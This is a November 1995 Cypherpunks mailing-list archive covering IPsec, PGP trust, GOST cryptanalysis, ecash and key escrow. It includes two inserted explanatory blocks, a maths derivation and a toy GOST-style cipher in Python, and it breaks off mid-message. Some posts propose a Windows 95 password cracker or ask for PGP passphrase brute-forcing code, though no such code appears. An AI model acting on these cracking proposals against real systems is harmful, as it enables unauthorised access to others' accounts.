> 'Tis a shame, because SKIP is available right now and will, if past history is any indication, become the defacto standard on Sun platforms because it is readily available, and the IPV6 stuff isn't, nor probably will be soon because even those with the source code are not permitted to give out mods to this source (in the case of SunOS - I believe). However, a loadable kernel module would be very nice with the IPv6 stuff in it. Unfortunately, I have very little experience with loadable kernel modules of this scope, nor the source code to use as a reference, should the loadable modules be feasible. -- ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug at eng.auburn.edu Pro is to Con as progress is to congress From black at sunflash.eng.usf.edu Wed Nov 29 12:50:46 1995 From: black at sunflash.eng.usf.edu (James Black) Date: Thu, 30 Nov 1995 04:50:46 +0800 Subject: key for Alice as promised (not) In-Reply-To: Message-ID: Hello, On Wed, 29 Nov 1995, jim bell wrote: > Wake up, idiot! The purpose of encryption and signing and such is to REDUCE > problems, ideally to zero but if not to some adequately small value. To > fail to use signing when there is no ongoing problem is risky; to not use > signing when there is a serious continuing problem is downright lunatic. > That sets up an irresolvable contradiction: On the one hand, you're willing > to tolerate a continuing problem, yet on the other you claim that your > standards are so high that you won't use a system unless the probability of > security essentially precludes a loss of security. Unfortunately priorities are mixed up here. Reputation should be more important, unless Alice is actually a group of teenagers that are just having fun at the lists expense, and could care less what they write as long as it gets a response. 
If the writer actually cared about his reputation then a digital signature would be the best way to go, but a different encryption scheme should be used for the signature than the message. Just my $0.02, but if Alice continues to just not care about his reputation, and people can't verify that the same writer(s) wrote it, then maybe ignoring posts would be a good choice. Take care and have fun. ========================================================================== James Black (Comp Sci/Comp Eng sophomore) e-mail: black at eng.usf.edu http://www.eng.usf.edu/~black/index.html ************************************************************************** From jlasser at rwd.goucher.edu Wed Nov 29 12:52:25 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Thu, 30 Nov 1995 04:52:25 +0800 Subject: key for Alice as promised (not) In-Reply-To: <199511290315.UAA26439@usr4.primenet.com> Message-ID: On Tue, 28 Nov 1995, Adam Hupp wrote: > >Can you imagine?? I'm simply not willing to fool myself into thinking > >that I ahve security by posting a key and using PGP. > > Unless you can post some proof that PGP is insecure, stop insisting it is. Hold on a minute. Alice is, here, 100% correct. If I use PGP to read messages and there's a videocamera trained on the keyboard, and other people have access to the machine, PGP is not secure. Similarly, if PGP is on a computer which other people may use without my supervision, they can monitor keystrokes, etc. and PGP is not secure. A chain is only as strong as its weakest link; Alice recognizes this, and makes no claim that PGP itself is the weak link. The weak link is the physical security of the system which Alice claims to use. Jon ------------------------------------------------------------------------------ Jon Lasser (410)494-3072 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. 
From jlasser at rwd.goucher.edu Wed Nov 29 12:58:50 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Thu, 30 Nov 1995 04:58:50 +0800 Subject: The future will be easy to use In-Reply-To: <199511290707.XAA24211@blob.best.net> Message-ID: On Mon, 27 Nov 1995, James A. Donald wrote: > At 03:30 PM 11/28/95 EST, Carl Ellison wrote: > > Of course. This isn't the base case. We would have some keys which I sign > > based on my own personal knowledge; things handed to me by people I know; > > some possibly published in the paper where the real key owner would see the > > claim and be able to contest it. > > You are making the same erroneous assumption that Phil made when he > designed the Web of trust: You assume that it is important and > interesting to link key ID's to physical bodies. This is usually > not the case: Linking key ID's to home web pages etc is not only > easier -- it is also usually more interesting and important. Not if you're encrypting a Credit Card transaction to ship physical goods. In that case, I'm going to certainly want to link a key ID to a physical body (or at least address) if I'm the seller, so as to limit liability as best I can. While this might not ultimately be important, early adopters of crypto on the net seem in general to be financially interested with an eye to limiting liability. They want linked keys. There's a public-relations aspect to crypto which most systems not linking name -> key id fail. This is the step necessary to get it out the door. Unfortunately, it also appears counter to CP philosophy. However, if you have optional linking of ID and name, shippers will only ship to keys with such attributes. Because just ID and address, it could be a "hit and run" type attack shipped to a safe maildrop. Jon ------------------------------------------------------------------------------ Jon Lasser (410)494-3072 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. 
Finger for PGP key. From perry at piermont.com Wed Nov 29 13:00:07 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 30 Nov 1995 05:00:07 +0800 Subject: SKIP Source Release is out! In-Reply-To: Message-ID: <199511291947.OAA03516@jekyll.piermont.com> Doug Hughes writes: > 'Tis a shame, because SKIP is available right now and will, if past history > is any indication, become the defacto standard on Sun platforms because it > is readily available, I suspect that no one else will use it. Morningstar is already shipping the ESP/AH stuff -- other router vendors are doubtless going to be doing so soon as well. All other hardware manufacturers will be running the normal IPSEC too. I suspect Sun is going to have a very tough sell. Perry From vznuri at netcom.com Wed Nov 29 13:03:55 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Thu, 30 Nov 1995 05:03:55 +0800 Subject: break microsoft!!! Message-ID: <199511291949.LAA04349@netcom13.netcom.com> re: the recent message that windows 95 has weak password encryption due to a 32 bit random seed sent to RC4-- this seems like another EXCELLENT opportunity for some major cypherpunks press coverage and feather-in-the-cap accolades. remember, the last break of the Netscape RC4 algorithm (or was it MD5?) got front page NYT coverage and reverberated throughout the entire media. a "cypherpunk" accomplishing the same thing for Microsoft would potentially get *major* notice. I imagine a short .exe file that when run on the proper computer prints out passwords as it cracks them. this would get the attention of a LOT of people. I have the MS C++ compiler, and if someone could discuss the difficulty of writing this proposed "exe" file, the rough time required to break the keys, and other considerations (physical access to server computer required?) and maybe point to code pieces on the net (RC4 etc.) to pull it off, I might start the effort myself. 
From stewarts at ix.netcom.com Wed Nov 29 13:13:16 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 30 Nov 1995 05:13:16 +0800 Subject: The future will be easy to use Message-ID: <199511292001.MAA16554@ix6.ix.netcom.com> At 03:30 PM 11/28/95 EST, Carl Ellison wrote: >BTW -- PGP currently lacks a way for me to note, when I sign a key, how it >is that I trust that key (by personal meeting, by attribution, by message >association, ...). A signed attribute record would let me record that >information for myself as well as for others. That would be a useful feature, even if it's just an unstructured text file. There is a way to do it now, though it's inefficient and hokey - create multiple key-signing keys, with name fields indicating the attribute, sign them with your main key, and use the appropriate one of them to sign keys for people. For instance, I have a key named "Bill Stewart Unauthenticated Pseudonym Signing Key " which I use to sign keys of significantly lower trust than my normal key; you could do similar things for higher-quality certification. This does increase the depth of the web-of-trust required, which is less of a problem for low-trust keys than for keys you actually care about :-) #-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 From weidai at eskimo.com Wed Nov 29 13:17:59 1995 From: weidai at eskimo.com (Wei Dai) Date: Thu, 30 Nov 1995 05:17:59 +0800 Subject: Elliptic curves, patent status? In-Reply-To: <199511290717.XAA29808@blob.best.net> Message-ID: On Mon, 27 Nov 1995, James A. Donald wrote: > > [are there patents that cover all public key cryptography?] > > No, but RSA will litigate you with the objective of > inflicting extravagant legal costs regardless. RSADSI no longer owns the Stanford patents (Hellman-Merkel, Diffie-Hellman) which they used to claim covered all public key cryptography. 
Those patents now belong to Cylink, who seems to be less litigious. Wei Dai From llurch at networking.stanford.edu Wed Nov 29 13:29:43 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Thu, 30 Nov 1995 05:29:43 +0800 Subject: Code to brute-force PGP passphrase? Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I have an old, forgotten PGP key for which I would like to issue a revocation certificate (or maybe I stole somebody else's with an identical name; who could tell?). I can put the key on a Mac, PC, or UNIX machine (various flavors). I think I have a pretty good idea what the middle of the passphrase contains, so I'd guess there are only about 2,000 possibilities to be explored. Anybody have code for any platform for cracking this? Alternatively, I could just give you the key and wait for the answer. - -rich -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMLzGmI3DXUbM57SdAQE8NAP9EKVkxVzsTPHQ0NcJJgU4aor8BQbjN2a5 OqNAkpeNoZOcn5NcqGBMjI6mVQbgVjnzDOdoDWngGmWbtruFcFjE1IM8iK/wScah Caqo7SuKQqUMXB8mAC5pVYmdavJrOX4WPcl6nT2MkJTvnJe7YgiCMWIdm+4XCPZ/ YybyYhWf7XA= =W5H8 -----END PGP SIGNATURE----- From attila at primenet.com Wed Nov 29 13:33:01 1995 From: attila at primenet.com (attila) Date: Thu, 30 Nov 1995 05:33:01 +0800 Subject: The future will be easy to use In-Reply-To: <199511291555.KAA02851@jekyll.piermont.com> Message-ID: On Wed, 29 Nov 1995, Perry E. Metzger wrote: > > attila writes: > > > > what about the Sun release announced today? --it is fully functional > > with DES and 3xDES, DH negotiation, etc. and is coded for either sun 4.1.3 > > or gcc compilers? Check out http://skip.incog.com. source to the SKIP > > key management and IP layer encryption package for SunOs 4.x. > > Ah, yes. The non-standard from Sun. > > It doesn't do D-H negotiation, by the way. It uses something I'd call > inferior. Read the flames in ipsec and ipsec-dev for details. > > .pm > figures. I'll give ipsec and ipsec-dev a look. 
However, SUN does have the power to make something happen on the high-power workstations, and the fact they are making a portable package available in source code is farther than anyone else has gone.

my experience over the last 15 years with Sun is that they do listen to outside "noise" and will move forward. I for one will be contacting my Catalyst rep and the software develop group; the time has passed when you could get Andy, Bill, or Scott on the squawker. I did complain to Scott about Catalyst changes --I did get a nice letter back, but I doubt it was authored by Scott. Andy resigned last year, and I have not heard from Bill for years.

other than the inferior method v. DH, is there anything else missing; I will probably pull the code package off the developers' access machine before the week is out just to take a look.

From perry at piermont.com Wed Nov 29 13:53:39 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 30 Nov 1995 05:53:39 +0800
Subject: The future will be easy to use
In-Reply-To:
Message-ID: <199511292128.QAA03706@jekyll.piermont.com>

attila writes:
> figures. I'll give ipsec and ipsec-dev a look. However, SUN does have
> the power to make something happen on the high-power workstations, and the
> fact they are making a portable package available in source code is
> farther than anyone else has gone.

Unfortunately, an internetworking protocol used by only one vendor gets nowhere.

> my experience over the last 15 years with Sun is that they do listen
> to outside "noise" and will move forward.

I doubt it. Ashar Aziz and company at Sun are pretty much ego-committed to SKIP. Their group might not have nearly as much justification for its existence without it. That probably makes them reluctant to go in the right direction.

> other than the inferior method v. DH, is there anything else missing;
> I will probably pull the code package off the developers' access machine
> before the week is out just to take a look.

SKIP is really very alien from the direction most of IPSEC is taking. It sacrifices a lot of functionality for the perceived benefit of being able to send an encrypted packet to a host "without prior negotiation". Unfortunately, that benefit turns out to be a mirage because in any real network you would need to do a certificate lookup in order to actually decrypt the packet, at which point you've lost any advantage. SKIP requires all sorts of hooks into the ESP/AH packet formats which makes it essentially incompatible with ESP/AH implementations. SKIP uses long term keys which could really hurt if they were compromised. SKIP doesn't do perfect forward secrecy. I could go on and on. Ashar keeps answering every criticism with "well, you COULD do X in SKIP if you just hung this kludge onto it, but of course we hope most people would never do that". I started with a lot of respect for the guys and lost most of it through time. Ah, well.

Perry

From llurch at networking.stanford.edu Wed Nov 29 14:01:10 1995
From: llurch at networking.stanford.edu (Rich Graves)
Date: Thu, 30 Nov 1995 06:01:10 +0800
Subject: break microsoft!!!
In-Reply-To: <199511291949.LAA04349@netcom13.netcom.com>
Message-ID:

Be careful not to sound too gleeful, lest you play into the evil nasty hacker stereotype. Keep the focus on the fact that real encryption is both possible and highly desired; the bad guys are lazy programmers and the US Government.

I have sent a pointer to the sci.crypt article to the win95netbugs list, which currently has eight Microsoft employees and nine major computer magazines on it. I might mention it to Microsoft's "technical people" when they drop by next week to address our networking concerns.

The answer, for anyone desiring one, is to turn off Win95's "multiple user profiles" features, turn off "encrypted password caching," and advertise the fact that Win95 is a totally insecure single-user OS, and will continue to be so as long as it uses the 1970's-vintage FAT file system. If real security is not available, the goal should be to eliminate the false sense of security that encourages people to leave sensitive files out in the open. -rich From jimbell at pacifier.com Wed Nov 29 14:45:19 1995 From: jimbell at pacifier.com (jim bell) Date: Thu, 30 Nov 1995 06:45:19 +0800 Subject: key for Alice as promised (not) Message-ID: >On Tue, 28 Nov 1995, Adam Hupp wrote: > >> >Can you imagine?? I'm simply not willing to fool myself into thinking >> >that I ahve security by posting a key and using PGP. >> >> Unless you can post some proof that PGP is insecure, stop insisting it is. > >Hold on a minute. Alice is, here, 100% correct. no, he isn't. He isn't even using a minimal effort to prevent spoofing, and he's blaming this on the fact that some particular piece of software (for example, PGP) isn't absolutely foolproof. >If I use PGP to read messages and there's a videocamera trained on the >keyboard, and other people have access to the machine, PGP is not >secure. Similarly, if PGP is on a computer which other people may use >without my supervision, they can monitor keystrokes, etc. and PGP is not >secure. True but irrelevant. This is especially true since the only purpose to signing messages to a public area is to prevent spoofing. If somebody does, indeed, figure out how to break (say) a 1024-bit PGP key and "Alice" gets spoofed, HE WILL KNOW because he will see a message with his signature that HE KNOWS he didn't send. At that point, he will at least be able to reduce the number of spoofed messages to 1 before he alerts us that there is a problem. 
We won't necessarily know who to believe, of course, but we will know that one of a number of this is probably true: 1 "Alice" is lying to us. (by far the most likely.) 2. Somebody actually has physical access to "Alice's" machine and is actively using it to spoof messages. 3. Somebody found out how to break 1024-bit PGP keys easily. (Very unlikely, of course.) >A chain is only as strong as its weakest link; Alice recognizes this, and >makes no claim that PGP itself is the weak link. But "Alice" resists using ANY chain at all! From attila at primenet.com Wed Nov 29 14:55:12 1995 From: attila at primenet.com (attila) Date: Thu, 30 Nov 1995 06:55:12 +0800 Subject: The future will be easy to use In-Reply-To: <199511292128.QAA03706@jekyll.piermont.com> Message-ID: OK, I have not seen it (like I said, I will get it) or read ipsec. However, despite the group ego, Sun _does_ listen and Sun does wish to be the leader. If the rest of ipsec group has a specific list, maybe it needs to presented higher up the pole. As fun as it might be to code it, you have enough on your plate with pgp alone. Sun's resources for a directed course are hard to beat; this is just another repeat of the first go around. SKIP obviously will not fly outside of Sun without industry support and if it has long term keys and can be compromised, it will be a tough row to how. time for a little pressure where it counts. the fact Sun released source indicates they are open enough to expect criticism. attila From fluffy at shout.net Wed Nov 29 14:56:03 1995 From: fluffy at shout.net (Chris Stillson) Date: Thu, 30 Nov 1995 06:56:03 +0800 Subject: GOST for sale Message-ID: <199511292216.QAA25781@duracef.shout.net> What I wonder about is why anyone would use the Algorithm that the NSA is probably best at breaking. Breaking GOST was probably their number one project for years, and I would suspect that they have done it. 
chris From raph at c2.org Wed Nov 29 15:10:28 1995 From: raph at c2.org (Raph Levien) Date: Thu, 30 Nov 1995 07:10:28 +0800 Subject: Response to ping re: CJR Message-ID: <199511292240.OAA09940@infinity.c2.org> I just got a message on my answering machine from Sam Capino. He said they are working on answer to my CJR. They had hoped to get it out by now, but were set back by "the furlough." I had called him about a week ago to check up on the status, but at the time only got his answering machine. Of course, the original 15 days have passed, but I'm perfectly willing to let that slide since I'm not completely sure that the CJR was submitted using exactly the right process. Just thought you'd like to know. Raph From pete at loshin.com Wed Nov 29 15:16:21 1995 From: pete at loshin.com (Pete Loshin) Date: Thu, 30 Nov 1995 07:16:21 +0800 Subject: "Proprietary" internetworking protocols (was RE: The future will be easy to use ) Message-ID: <01BABE83.A3A80240@ploshin.tiac.net> Perry E. Metzger writes: >attila writes: >>figures. I'll give ipsec and ipsec-dev a look. However, SUN does have >>the power to make something happen on the high-power workstations, and the >>fact they are making a portable package available in source code is >>farther than anyone else has gone. > >Unfortunately, an internetworking protocol used by only one vendor >gets nowhere. much other discussion ommitted... I hate to quibble, but past experience may demonstrate this to be inaccurate. In particular, and most relevantly: NFS (Sun) SSL (Netscape) Another internetworking protocol (IPX) gave Novell a good run. The point is that a working implementation goes a long way for people who want/need _something_ that works, NOW. Consider the relative merits/success of S-HTTP and SSL. ObCrypto: the POTP people are the Boston Internet Expo today and tomorrow, and they have their "technical guy" who is supposed to be answering questions. 
The nontechnical guy said they generate random numbers using randomness taken from the text of the messages being encrypted.

-pl

_Electronic Commerce_ (Charles River Media, available now)
pete at loshin.com

From acceso2 at diatel.upm.es Wed Nov 29 15:31:22 1995
From: acceso2 at diatel.upm.es (Usuario Acceso2)
Date: Thu, 30 Nov 1995 07:31:22 +0800
Subject: Question on modular exponents
Message-ID: <230*/S=acceso2/OU=diatel/O=upm/PRMD=iris/ADMD=mensatex/C=es/@MHS>

Hi CP's:

I'd be pleased if someone explained this to me ASAP:

How could I demonstrate that

    (g^a)^b (mod p) = g^{(a*b) mod q} mod p

when g's order in Zp is q?

The same question remains for addition. I have the feeling the demonstration must be similar.

Best.

Jaime

From dl at hplyot.obspm.fr Wed Nov 29 15:36:41 1995
From: dl at hplyot.obspm.fr (Laurent Demailly)
Date: Thu, 30 Nov 1995 07:36:41 +0800
Subject: ecash casino
In-Reply-To: <199511291640.IAA28114@infinity.c2.org>
Message-ID: <9511292318.AA27417@hplyot.obspm.fr>

sameer at c2.org writes:
> Any enterprising cypherpunks in gambling-friendly
> jurisdictions interested? I figure it would make ecash take off.. and
> you'd get rich.

Good idea, I'd gladly provide (read sell ;-) know-how :-)

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...
Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept DST Kaser Sose Panama Castro Khaddafi Ortega arrangements

From JMKELSEY at delphi.com Wed Nov 29 15:49:53 1995
From: JMKELSEY at delphi.com (JMKELSEY at delphi.com)
Date: Thu, 30 Nov 1995 07:49:53 +0800
Subject: GOST for sale
Message-ID: <01HY74DKD11A9IFJI3@delphi.com>

-----BEGIN PGP SIGNED MESSAGE-----

>Date: Fri, 24 Nov 1995 03:43:25 +0100 (MET)
>From: Mats Bergstrom
>Subject: GOST for sale

>According to a short article in a Swedish newspaper (DN)
>with the title 'Spy Code of KGB can make computers safe',
>JETICO INC., located in Finland (Tammerfors), introduced
>a new crypto system on the world market last week. It's
>based on GOST, the Russian federal standard algorithm.
>This product, called BestCrypt, is implemented at least
>partly in hardware. Allegedly it uses 'GOST 28147-89',
>whatever that stands for.

Hmmm.

>GOST is probably very secure - a huge keyspace (256 bits) and
>KGB would not have left a trapdoor for NSA to take advantage
>of, would they?

If this is the cipher I've seen, it's not overwhelmingly impressive, though it may be OK. I haven't ever made any serious attempt to attack it, and I don't know anyone else who has. Anyone have a reference?

Basically, GOST is a balanced Feistel network (like DES), but its F-function is much simpler. Basically,

    F(X,K) = Rotate_Left(S(X+K),11),

where S(t) denotes parallel application of eight 4:4 S-boxes. Depending on the implementation, these S-boxes' contents could be key-dependent and pseudorandom, or fixed. Unfortunately small random S-boxes are likely to have some weaknesses W.R.T. differential cryptanalysis. This can be true even when the S-boxes are secret and key-derived--see Biham and Biryukov's paper in Auscrypt '94 on a DES variant with variable S-boxes, for a quick discussion of this. And the security of this scheme is very much going to depend upon the S-boxes used. If the S-boxes are generated at (pseudo)random from the key, I'd expect there to be some pretty nasty weak key conditions that could occasionally come up.

On the other hand, GOST is defined with 32 rounds, so it may be hard to find any useful differential or linear characteristics, even for relatively bad S-box choices, that have high enough probability to get through 29-31 rounds. And it has a 256-bit key, so even if someone determines some attack which recovers 160 bits of the key, there are still 96 bits of key left to provide security.

The GOST key schedule is really simple, though it avoids the most obvious kind of related key attack. I wouldn't be surprised to see some interesting related key attacks be possible. This is interesting because there is also a hash function based on GOST--I'd be pretty reluctant to use this without a lot of analysis.

>The newspaper article ends:
>
>'The Finnish entrepreneurs asseverate that their
>Russian colleagues have never had anything to do
>with the KGB.'

I may be mistaken, but wasn't there some other internal organization in the USSR that did cryptography?

>Mats

Note: Please respond via e-mail as well as or instead of posting, as I get CP-LITE instead of the whole list.

--John Kelsey, jmkelsey at delphi.com
PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLv0kkHx57Ag8goBAQFH3AP+JR1sEQCH0ANmNSDFhzpCZb4jn4uqq23v
PjZfFOrYc9SrD1xn+3azqfHFpiHIubfWzZ8u1aNEf4erAErbQLPAUOLPv17zhn//
6UEVKX4GhPqoLfou+wO38rF2DwWdeCjuQm2GgxuFpw5b0D4M3V1mv5ocLOoOMq2N
twdfxiMtO6Y=
=BOER
-----END PGP SIGNATURE-----

From EALLENSMITH at ocelot.Rutgers.EDU Wed Nov 29 15:59:49 1995
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Thu, 30 Nov 1995 07:59:49 +0800
Subject: The future will be easy to use
Message-ID: <01HY84MS8LTC8WYXJI@mbcl.rutgers.edu>

From: IN%"perry at piermont.com" 28-NOV-1995 13:34:33.55

Jonathan Zamick writes:
> I can't agree.
The model of a successful enterprise includes feedback from > different levels of participants. This isn't an enterprise. The government is not a participant except by their own desire to interfere. --------- One reason to incorporate a probable opponent into something is to see what methods the opponent will likely use. For instance, their debating points would be nice to know in advance (to the degree they aren't already); while cyberpunks don't have much access to the mass media, that on the Net (where a lot of the initial potential users are likely to be) is another matter. Getting clues to their likely legal strategy may also be valuable. On the other hand, letting them know too much may be a problem... of course, I'm _certain_ the NSA, etcetera get copies of this list. -Allen From EALLENSMITH at ocelot.Rutgers.EDU Wed Nov 29 16:16:29 1995 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Thu, 30 Nov 1995 08:16:29 +0800 Subject: Directed Hamiltonian Path Problem Message-ID: <01HY84U9MG468WYXJI@mbcl.rutgers.edu> From: IN%"tcmay at got.net" 28-NOV-1995 20:15:30.64 The reason we speak in terms of physical volumes of "Adleman computers" is to make concrete the way things scale. If the amount of Adleman computers needed to factor, say, a 2000-digit modulus (or some reasonably equivalent Hamiltonian cycle problem, such as the TSP) is "ten Pacific oceans full of them running for 100 years," then one has a pretty clear feel for just how futile it is to ask about "But what about if we apply MASSIVE PARALLELISM?!?!" ------------ Ah. My objection is probably from being too much of a purist in my own area of science. I do tend to try to be quite careful in whatever I write to use the correct terms (then explain them for those who've heard the incorrect ones). ------------- I don't worry much about factoring breakthroughs. 
And I don't mean minor improvements, which keep occurring: I mean major breakthroughs which would make factoring a 2000-decimal-digit number "easy." Practically speaking, snarfing private keys is a helluva lot easier, for many reasons. -------------- Umm... it's easier for each one. But the effort in question adds up. Ultimately, for an agency (NSA, CIA, etcetera) wanting to do a lot of such unencryptings, coming up with a factoring method is the most efficient way to go. Fortunately, science doesn't work very well with security classifications (unlike engineering, which is what most military classified "science" is from what I know). -Allen From iagoldbe at calum.csclub.uwaterloo.ca Wed Nov 29 16:38:24 1995 From: iagoldbe at calum.csclub.uwaterloo.ca (Ian Goldberg) Date: Thu, 30 Nov 1995 08:38:24 +0800 Subject: ecash protocol: Part 1 In-Reply-To: <199511212146.NAA11456@cory.EECS.Berkeley.EDU> Message-ID: <49it0e$r4i@calum.csclub.uwaterloo.ca> In article <199511212146.NAA11456 at cory.EECS.Berkeley.EDU>, Ian Goldberg wrote: >I've managed to decipher a useful bit of the first message sent from >the shop to the payer. It's the Payment Request, and contains the following >information: > >o Header identifying packet as Payment Request >o The integer 4 >o The payment amount, in cents >o The time (seconds since 1970) >o The integer 79 >o The name of the shop (payee) >o A description of the item being paid for >o An empty string >o The integer 0 >o End of Record marker > >I don't know what the 4, 79, empty string, and 0 are for. I assume one >of them (probably the 4) is some indication of currency (US cents). I now know what the empty string and the 0 are for. In the event that a Payment Request is sent out-of-band (in an application/ecash message, for example), the string and integer are the hostname and port (commonly 1100) to which the payer should connect in order to send a payment. - Ian "Wait for it..." 
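
[Added worked derivation, not part of any message in this archive. It answers the "Question on modular exponents" post above, using that post's symbols g, a, b, p, q, and assumes only that g has order q modulo p, i.e. g^q = 1 (mod p).]

    Write a*b = k*q + r, where r = (a*b) mod q and 0 <= r < q.

    (g^a)^b = g^{a*b}
            = g^{k*q + r}
            = (g^q)^k * g^r
            = 1^k * g^r
            = g^{(a*b) mod q}   (mod p)

    For addition, write a + b = k'*q + r', where r' = (a+b) mod q.

    g^a * g^b = g^{a+b}
              = (g^q)^{k'} * g^{r'}
              = g^{(a+b) mod q}   (mod p)

The only fact used is g^q = 1 (mod p), so exponents of g can always be reduced mod q. Because q is the exact order of g, two exponents give the same power of g precisely when they are congruent mod q.
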
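
[Added example, not part of any message in this archive and not code from JETICO or any GOST product. It implements the structure John Kelsey describes in "GOST for sale" above (balanced Feistel network, F(X,K) = Rotate_Left(S(X+K),11), eight 4:4 S-boxes, 32 rounds, 256-bit key) and measures the S-box differential property he warns about. Assumptions: the S-boxes are constructed from a seeded PRNG as stand-ins, the subkey order is the one in the published GOST 28147-89 standard rather than anything stated in the message, and the little-endian byte layout is a choice made here.]

```python
# Added illustration of a GOST-style balanced Feistel cipher.
import random

MASK32 = 0xFFFFFFFF


def make_sboxes(seed):
    """Eight 4-bit permutations from a seeded PRNG.

    Constructed stand-ins for key-derived or fixed tables; NOT the tables
    of any real GOST deployment and not a secure way to derive them.
    """
    rng = random.Random(seed)
    boxes = []
    for _ in range(8):
        perm = list(range(16))
        rng.shuffle(perm)
        boxes.append(perm)
    return boxes


def rotl32(x, n):
    """Rotate a 32-bit word left by n bits."""
    return ((x << n) | (x >> (32 - n))) & MASK32


def f(x, k, sboxes):
    """F(X, K) = Rotate_Left(S(X + K), 11), with the addition taken mod 2^32."""
    t = (x + k) & MASK32
    s = 0
    for i, box in enumerate(sboxes):  # eight 4-bit S-boxes applied side by side
        s |= box[(t >> (4 * i)) & 0xF] << (4 * i)
    return rotl32(s, 11)


def subkey_order(decrypt=False):
    """Round-to-subkey map of GOST 28147-89: K0..K7 three times, then K7..K0."""
    order = list(range(8)) * 3 + list(range(7, -1, -1))
    return order[::-1] if decrypt else order


def crypt_block(block, key, sboxes, decrypt=False):
    """Encrypt or decrypt one 8-byte block under a 32-byte (256-bit) key."""
    if len(block) != 8 or len(key) != 32:
        raise ValueError("need an 8-byte block and a 32-byte key")
    k = [int.from_bytes(key[4 * i:4 * i + 4], "little") for i in range(8)]
    left = int.from_bytes(block[:4], "little")
    right = int.from_bytes(block[4:], "little")
    for idx in subkey_order(decrypt):
        left, right = right, left ^ f(right, k[idx], sboxes)
    # Undo the final swap so the same routine decrypts with reversed subkeys.
    return right.to_bytes(4, "little") + left.to_bytes(4, "little")


def max_differential(box):
    """Largest difference-distribution-table entry over nonzero input differences.

    16 means some input difference maps to one output difference with
    certainty; lower is better for resisting differential cryptanalysis.
    """
    worst = 0
    for dx in range(1, 16):
        counts = [0] * 16
        for x in range(16):
            counts[box[x] ^ box[x ^ dx]] += 1
        worst = max(worst, max(counts))
    return worst


def survey(seeds):
    """Histogram: worst S-box differential in each randomly generated S-box set."""
    hist = {}
    for seed in seeds:
        worst = max(max_differential(b) for b in make_sboxes(seed))
        hist[worst] = hist.get(worst, 0) + 1
    return hist


if __name__ == "__main__":
    key = bytes(range(32))       # constructed sample key
    boxes = make_sboxes(1995)    # constructed sample S-boxes
    ct = crypt_block(b"8 bytes!", key, boxes)
    assert crypt_block(ct, key, boxes, decrypt=True) == b"8 bytes!"
    print("ciphertext:", ct.hex())
    print("worst DDT entry -> S-box sets:", sorted(survey(range(200)).items()))
```

The survey output shows how the quality of randomly chosen 4-bit S-boxes varies from one set to the next, which is the reason the message says the scheme's security depends heavily on the S-boxes used.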
From dmandl at bear.com Thu Nov 30 08:55:17 1995 From: dmandl at bear.com (David Mandl) Date: Thu, 30 Nov 95 08:55:17 PST Subject: "Got a subpoena?" In-Reply-To: <199511301606.IAA17493@infinity.c2.org> Message-ID: On Thu, 30 Nov 1995, sameer wrote: > Community ConneXion will comply with all properly formed court > orders and subpoenas. We will *not* cooperate without court > intervention. (I.e. Mr. FBI calls up and says "can you help us find > this suspect"? I respond "got a subpoena?") But it's not quite that simple, Sameer. Don't underestimate the more subtle forms of non-cooperation you can engage in. To use the most obvious example, different remailer operators turn different levels of logging on. So one operator will say "Yes, I am obligated to fully comply with your subpoena, officer. Here are the full logs for the last six months." And another will say "Yes, I am obligated to fully comply with your subpoena, officer. However, I keep no logs at all of the mail sent through my remailer. Drag, huh?" Being the eternal pessimist, I once again point out that the government will try to stop cryptoanarchy any way they can. Their main tool is the law, and they WILL use it eventually when all else fails. Personally, I would play it safe by operating on the assumption that basically EVERYTHING will be illegal eventually and "finessing" laws will become more important. In short, they WILL have a subpoena--then what? Of course, I personally would never do anything illegal. --Dave. -- David Mandl Bear, Stearns & Co. Inc. Phone: (212) 272-3888 Email: dmandl at bear.com -- ******************************************************************************* Bear Stearns is not responsible for any recommendation, solicitation, offer or agreement or any information about any transaction, customer account or account activity contained in this communication.
******************************************************************************* From jamesd at echeque.com Thu Nov 30 08:55:52 1995 From: jamesd at echeque.com (James A. Donald) Date: Thu, 30 Nov 95 08:55:52 PST Subject: Netscape gives in to key escrow Message-ID: <199511301654.IAA26162@blob.best.net> At 12:55 AM 11/30/95 -0800, Jeff Weinstein wrote: > All press accounts I've read so far > have lots of stuff attributed to Jim, but very little of it is actual > quotes. Then we would like to hear Jim "clarify" his position. Absent such clarification, we must assume he considers the press reports of what he said to be reasonably accurate. > I don't want to go down in history as a facilitator of the totalitarian > state, and I don't think anyone else here does either. Most of the major players have taken a position overtly opposed to GAK (whilst leaving themselves some wriggle room, should the heat get too severe). What is netscape's position? --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From jamesd at echeque.com Thu Nov 30 09:00:47 1995 From: jamesd at echeque.com (James A. Donald) Date: Thu, 30 Nov 95 09:00:47 PST Subject: cypherpunks at ietf Message-ID: <199511301700.JAA29522@blob.best.net> > OUR CURRENT PROBLEM IS THAT THE AVERAGE CONSUMER CAN NOT COMPLETE AN ACCURATE > SEARCH ON THE WEB. > > [...] > > AT THIS POINT SO MANY CYBERPUNKS HAVE EMBEDDED SO MUCH GARBAGE ON THE WEB, > THAT YOU CAN NOT 